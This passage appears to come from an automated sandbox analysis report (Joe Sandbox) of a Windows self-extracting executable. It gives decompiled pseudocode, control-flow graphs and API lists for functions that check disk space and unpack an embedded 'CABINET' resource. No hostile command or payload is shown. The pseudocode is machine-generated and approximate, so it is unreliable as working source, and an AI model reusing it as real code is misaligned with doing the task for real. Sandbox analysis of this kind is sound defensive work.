                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 5597d-559b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 559dd-55a1b GetDiskFreeSpaceA 324->325 326 559bb-559d8 call 544b9 call 56285 324->326 328 55ba1-55bde memset call 56285 GetLastError FormatMessageA 325->328 329 55a21-55a4a MulDiv 325->329 341 55c05-55c14 call 56ce0 326->341 338 55be3-55bfc call 544b9 SetCurrentDirectoryA 328->338 329->328 332 55a50-55a6c GetVolumeInformationA 329->332 335 55ab5-55aca SetCurrentDirectoryA 332->335 336 55a6e-55ab0 memset call 56285 GetLastError FormatMessageA 332->336 340 55acc-55ad1 335->340 336->338 352 55c02 338->352 344 55ad3-55ad8 340->344 345 55ae2-55ae4 340->345 344->345 347 55ada-55ae0 344->347 349 55ae7-55af8 345->349 350 55ae6 345->350 347->340 347->345 351 55af9-55afb 349->351 350->349 354 55b05-55b08 351->354 355 55afd-55b03 351->355 356 55c04 352->356 357 55b20-55b27 354->357 358 55b0a-55b1b call 544b9 354->358 355->351 355->354 356->341 360 55b52-55b5b 357->360 361 55b29-55b33 357->361 358->352 364 55b62-55b6d 360->364 361->360 363 55b35-55b50 361->363 363->364 365 55b76-55b7d 364->365 366 55b6f-55b74 364->366 368 55b83 365->368 369 55b7f-55b81 365->369 367 55b85 366->367 370 55b87-55b94 call 5268b 367->370 371 55b96-55b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0005597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v788;
                                                                                                                                                                                                                                                				long _v792;
                                                                                                                                                                                                                                                				long _v796;
                                                                                                                                                                                                                                                				long _v800;
                                                                                                                                                                                                                                                				signed int _v804;
                                                                                                                                                                                                                                                				long _v808;
                                                                                                                                                                                                                                                				int _v812;
                                                                                                                                                                                                                                                				long _v816;
                                                                                                                                                                                                                                                				long _v820;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                                				signed short _t78;
                                                                                                                                                                                                                                                				signed int _t87;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				int _t102;
                                                                                                                                                                                                                                                				unsigned int _t103;
                                                                                                                                                                                                                                                				unsigned int _t105;
                                                                                                                                                                                                                                                				signed int _t111;
                                                                                                                                                                                                                                                				long _t112;
                                                                                                                                                                                                                                                				signed int _t116;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                                				signed int _t120;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t114 = __edi;
                                                                                                                                                                                                                                                				_t46 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                                				_v804 = __edx;
                                                                                                                                                                                                                                                				_t118 = __ecx;
                                                                                                                                                                                                                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                                				if(_t50 != 0) {
                                                                                                                                                                                                                                                					_push(__edi);
                                                                                                                                                                                                                                                					_v796 = 0;
                                                                                                                                                                                                                                                					_v792 = 0;
                                                                                                                                                                                                                                                					_v800 = 0;
                                                                                                                                                                                                                                                					_v808 = 0;
                                                                                                                                                                                                                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                                					__eflags = _t55;
                                                                                                                                                                                                                                                					if(_t55 == 0) {
                                                                                                                                                                                                                                                						L29:
                                                                                                                                                                                                                                                						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                						 *0x59124 = E00056285();
                                                                                                                                                                                                                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                						_t110 = 0x4b0;
                                                                                                                                                                                                                                                						L30:
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						E000544B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                                						L31:
                                                                                                                                                                                                                                                						_t66 = 0;
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						L32:
                                                                                                                                                                                                                                                						_pop(_t114);
                                                                                                                                                                                                                                                						goto L33;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                                					_v812 = _t69;
                                                                                                                                                                                                                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                                					__eflags = _t116;
                                                                                                                                                                                                                                                					if(_t116 == 0) {
                                                                                                                                                                                                                                                						goto L29;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                                					__eflags = _t73;
                                                                                                                                                                                                                                                					if(_t73 != 0) {
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                                						_t101 =  &_v16;
                                                                                                                                                                                                                                                						_t111 = 6;
                                                                                                                                                                                                                                                						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                                						__eflags = _t119;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                                							__eflags = _t22;
                                                                                                                                                                                                                                                							if(_t22 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                                							__eflags = _t87;
                                                                                                                                                                                                                                                							if(_t87 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *_t101 = _t87;
                                                                                                                                                                                                                                                							_t101 = _t101 + 1;
                                                                                                                                                                                                                                                							_t111 = _t111 - 1;
                                                                                                                                                                                                                                                							__eflags = _t111;
                                                                                                                                                                                                                                                							if(_t111 != 0) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t111;
                                                                                                                                                                                                                                                						if(_t111 == 0) {
                                                                                                                                                                                                                                                							_t101 = _t101 - 1;
                                                                                                                                                                                                                                                							__eflags = _t101;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t101 = 0;
                                                                                                                                                                                                                                                						_t112 = 0x200;
                                                                                                                                                                                                                                                						_t102 = _v812;
                                                                                                                                                                                                                                                						_t78 = 0;
                                                                                                                                                                                                                                                						_t118 = 8;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                                							if(_t102 == _t112) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                                							_t78 = _t78 + 1;
                                                                                                                                                                                                                                                							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                							if(_t78 < _t118) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                						if(_t78 != _t118) {
                                                                                                                                                                                                                                                							__eflags =  *0x59a34 & 0x00000008;
                                                                                                                                                                                                                                                							if(( *0x59a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                                								L20:
                                                                                                                                                                                                                                                								_t103 =  *0x59a38; // 0x0
                                                                                                                                                                                                                                                								_t110 =  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                                								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                                									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                                									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									 *0x59124 = 0;
                                                                                                                                                                                                                                                									_t66 = 1;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t66 = E0005268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                                							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t105 =  *0x59a38; // 0x0
                                                                                                                                                                                                                                                							_t110 =  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                							_t103 = (_t105 >> 2) +  *0x59a38;
                                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t110 = 0x4c5;
                                                                                                                                                                                                                                                						E000544B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                					 *0x59124 = E00056285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                					_t110 = 0x4f9;
                                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t110 = 0x4bc;
                                                                                                                                                                                                                                                					E000544B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x59124 = E00056285();
                                                                                                                                                                                                                                                					_t66 = 0;
                                                                                                                                                                                                                                                					L33:
                                                                                                                                                                                                                                                					return E00056CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x000559e4
                                                                                                                                                                                                                                                0x000559f1
                                                                                                                                                                                                                                                0x000559fe
                                                                                                                                                                                                                                                0x00055a0b
                                                                                                                                                                                                                                                0x00055a13
                                                                                                                                                                                                                                                0x00055a19
                                                                                                                                                                                                                                                0x00055a1b
                                                                                                                                                                                                                                                0x00055ba1
                                                                                                                                                                                                                                                0x00055baf
                                                                                                                                                                                                                                                0x00055bbd
                                                                                                                                                                                                                                                0x00055bd8
                                                                                                                                                                                                                                                0x00055bde
                                                                                                                                                                                                                                                0x00055be3
                                                                                                                                                                                                                                                0x00055bec
                                                                                                                                                                                                                                                0x00055bf0
                                                                                                                                                                                                                                                0x00055bfc
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00055a27
                                                                                                                                                                                                                                                0x00055a3a
                                                                                                                                                                                                                                                0x00055a46
                                                                                                                                                                                                                                                0x00055a48
                                                                                                                                                                                                                                                0x00055a4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055a64
                                                                                                                                                                                                                                                0x00055a6a
                                                                                                                                                                                                                                                0x00055a6c
                                                                                                                                                                                                                                                0x00055abc
                                                                                                                                                                                                                                                0x00055ac2
                                                                                                                                                                                                                                                0x00055ac9
                                                                                                                                                                                                                                                0x00055aca
                                                                                                                                                                                                                                                0x00055aca
                                                                                                                                                                                                                                                0x00055acc
                                                                                                                                                                                                                                                0x00055acc
                                                                                                                                                                                                                                                0x00055acf
                                                                                                                                                                                                                                                0x00055ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ad3
                                                                                                                                                                                                                                                0x00055ad6
                                                                                                                                                                                                                                                0x00055ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ada
                                                                                                                                                                                                                                                0x00055adc
                                                                                                                                                                                                                                                0x00055add
                                                                                                                                                                                                                                                0x00055add
                                                                                                                                                                                                                                                0x00055ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ae0
                                                                                                                                                                                                                                                0x00055ae2
                                                                                                                                                                                                                                                0x00055ae4
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae9
                                                                                                                                                                                                                                                0x00055aeb
                                                                                                                                                                                                                                                0x00055af0
                                                                                                                                                                                                                                                0x00055af6
                                                                                                                                                                                                                                                0x00055af8
                                                                                                                                                                                                                                                0x00055af9
                                                                                                                                                                                                                                                0x00055af9
                                                                                                                                                                                                                                                0x00055afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055afd
                                                                                                                                                                                                                                                0x00055aff
                                                                                                                                                                                                                                                0x00055b00
                                                                                                                                                                                                                                                0x00055b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b03
                                                                                                                                                                                                                                                0x00055b05
                                                                                                                                                                                                                                                0x00055b08
                                                                                                                                                                                                                                                0x00055b20
                                                                                                                                                                                                                                                0x00055b27
                                                                                                                                                                                                                                                0x00055b52
                                                                                                                                                                                                                                                0x00055b52
                                                                                                                                                                                                                                                0x00055b5b
                                                                                                                                                                                                                                                0x00055b62
                                                                                                                                                                                                                                                0x00055b6b
                                                                                                                                                                                                                                                0x00055b6d
                                                                                                                                                                                                                                                0x00055b76
                                                                                                                                                                                                                                                0x00055b7d
                                                                                                                                                                                                                                                0x00055b83
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b6f
                                                                                                                                                                                                                                                0x00055b72
                                                                                                                                                                                                                                                0x00055b72
                                                                                                                                                                                                                                                0x00055b85
                                                                                                                                                                                                                                                0x00055b98
                                                                                                                                                                                                                                                0x00055b9e
                                                                                                                                                                                                                                                0x00055b87
                                                                                                                                                                                                                                                0x00055b8f
                                                                                                                                                                                                                                                0x00055b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b85
                                                                                                                                                                                                                                                0x00055b29
                                                                                                                                                                                                                                                0x00055b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000559A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 000559AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00055A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00055A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00055A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00055A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00055A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00055AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00055BFC
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 2b0a953101ce7a492a8053491796b44776efc8abc5c032eb273867d76a5e7205
                                                                                                                                                                                                                                                • Instruction ID: 0539d0c6b227e948f4ce7ec982173aa7ffe253239ed7430ec85f44bc647426f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b0a953101ce7a492a8053491796b44776efc8abc5c032eb273867d76a5e7205
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D71A7B1A0071C9FFB65DB60CC99BFB77ACEB48303F4445A9F80592181DB349E888B65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 374 54fe0-5501a call 5468f FindResourceA LoadResource LockResource 377 55161-55163 374->377 378 55020-55027 374->378 379 55057-5505e call 54efd 378->379 380 55029-55051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 55060-55077 call 544b9 379->383 384 5507c-550b4 379->384 380->379 388 55107-5510e 383->388 389 550b6-550da 384->389 390 550e8-55104 call 544b9 384->390 392 55110-55117 FreeResource 388->392 393 5511d-5511f 388->393 398 55106 389->398 399 550dc 389->399 390->398 392->393 396 55121-55127 393->396 397 5513a-55141 393->397 396->397 400 55129-55135 call 544b9 396->400 401 55143-5514a 397->401 402 5515f 397->402 398->388 405 550e3-550e6 399->405 400->397 401->402 403 5514c-55159 SendMessageA 401->403 402->377 403->402 405->390 405->398
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00054FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t9;
                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t27;
                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t36 = "CABINET";
                                                                                                                                                                                                                                                				 *0x59144 = E0005468F(_t36, 0, 0);
                                                                                                                                                                                                                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                                				 *0x59140 = _t8;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					return _t8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t9 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem( *0x58584, 0x841), 5);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t10 = E00054EFD(0, 0);
                                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                                					__imp__#20(E00054CA0, E00054CC0, E00054980, E00054A50, E00054AD0, E00054B60, E00054BC0, 1, 0x59148, _t33);
                                                                                                                                                                                                                                                					_t34 = _t10;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						_t29 =  *0x59148; // 0x0
                                                                                                                                                                                                                                                						_t24 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                						E000544B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#22(_t34, "*MEMCAB", 0x51140, 0, E00054CD0, 0, 0x59140); // executed
                                                                                                                                                                                                                                                					_t37 = _t10;
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                					E000544B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_t12 =  *0x59140; // 0x0
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						FreeResource(_t12);
                                                                                                                                                                                                                                                						 *0x59140 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						_t47 =  *0x591d8; // 0x0
                                                                                                                                                                                                                                                						if(_t47 == 0) {
                                                                                                                                                                                                                                                							E000544B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(( *0x58a38 & 0x00000001) == 0 && ( *0x59a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                						SendMessageA( *0x58584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00054FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00055006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0005500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00055030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00055037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0005504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00055051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00055111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00055159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 9b190de344fab2f7742538691da3a9819656746d34597b7e9790c12f2d173372
                                                                                                                                                                                                                                                • Instruction ID: 02efa0e99c40939cbfadde2056a31f69ce3bd18cde6c121bc28d8968e8514ffd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b190de344fab2f7742538691da3a9819656746d34597b7e9790c12f2d173372
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F310770740F11BBFB605B61AC9EFA73A9CA74574BF044114BE05A61E1DBBC8C888B69
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
